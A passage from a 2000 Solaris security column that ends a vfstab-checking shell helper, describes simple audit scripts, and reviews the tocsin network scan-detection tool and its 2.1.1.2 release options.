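# vfstab_ok VFSTAB_TEXT: exit status 0 when the lint reports nothing.
vfstab_ok() {
    [ -z "$(vfstab_lint "$1")" ]
}

# Example run: three findings for the weak table, none for the fixed one.
vfstab_lint "$(weak_vfstab)"
vfstab_ok "$(fixed_vfstab)" && echo "fixed vfstab: OK"
```

On a live system, `vfstab_lint "$(cat /etc/vfstab)"` checks the file you are about to boot from; comparing its mount points against `mount` output then shows whether an option in the file is actually in effect.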
Auditing the security of an existing Solaris system can be time consuming, and often requires on-site visits. There are several commercial tools and a few free ones (e.g. Titan and the Coroner's Toolkit) that help, but they can be complicated and require local installation. A few weeks back we presented a small Bourne shell script for simple auditing; this has now been updated and complemented with a second script.
Purpose:
For situations where a "quick audit" of the system is required.
Simple to run: the auditor could even give it to the sysadmin, ask him to run it at night and send the results back to the auditor (perhaps by encrypted email).
Its simplicity makes it easy to verify; it is not as thorough as other tools, but it is small and easy to understand.
This script automates the gathering of the information only, of course the
difficult part is the interpretation and deciding what countermeasures to take.
This has now developed into two scripts:
Please read the headers in the scripts before using.
Doug Hughes (Doug.Hughes@Eng.Auburn.edu) wrote tocsin, a "featherweight network intrusion detection system", back in 1996. It is a free tool that listens for network scans. Tocsin only needs to be installed once per subnet, unless switches are used (i.e. not all nodes see all traffic). It uses DLPI [see note1] kernel-level packet filtering and runs out of the box on SunOS and Solaris to catch port and stealth scans (SYN, FIN, ACK, Xmas, RST, etc.). Alert messages are logged to the syslog facility 'auth'; startup and shutdown messages are logged to 'daemon'.
Over the last few weeks tocsin has been significantly improved and version 2.1.1.2 released:
fixed log file permissions
new tcp or udp options (:t or :u) per service
ported to Solaris 8 sparc/Intel
new common package for Solaris sparc/Intel
change UID to nobody after binding to the network
new man page and startup file 'S70tocsin' added
New options: -T tcp only, -D destination network only, -O log IP options,
-I invert port matching filter conditions.
This amazing little tool (it's only 20kB) is simple, but works quite well. The new options allow a significant reduction of false positives. For this article, it was tested on Solaris 2.7-2.8/sparc and Solaris 2.8/Intel, but it should run on Solaris 2.6 and possibly 2.5.1 also.
tocsin can be downloaded in source form (tocsin.tar.gz), or as a Solaris package (AUBtocsin), from:
ftp://ftp.eng.auburn.edu/pub/doug/
Doug has done great work with tocsin; if you've been waiting for a simple but effective IDS, this is worth a look.
Note1: DLPI is the Datalink Provider Interface (a standard based on ISO 8886 and 8802 for Streams based kernel implementations of packet filtering)
If you have any security tips/scripts you'd like to share with others, contact sean AT boran.com.
For brevity, the list of resources and references is kept in a separate document:
http://www.securityportal.com/topnews/weekly/solarisref.html
Seán Boran is an IT security consultant based in Switzerland and the author of the online IT Security Cookbook.
© Copyright 2000, SecurityPortal Inc. & Seán Boran, All Rights Reserved, Last Update: 10 November, 2000